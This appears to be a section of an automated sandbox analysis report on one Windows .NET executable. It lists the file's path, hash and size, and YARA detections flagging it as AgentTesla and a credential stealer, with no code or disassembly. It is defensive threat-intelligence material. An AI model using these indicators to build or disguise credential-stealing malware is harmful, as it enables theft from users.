                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Imagebase:0x820000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Disassembly

                                                No disassembly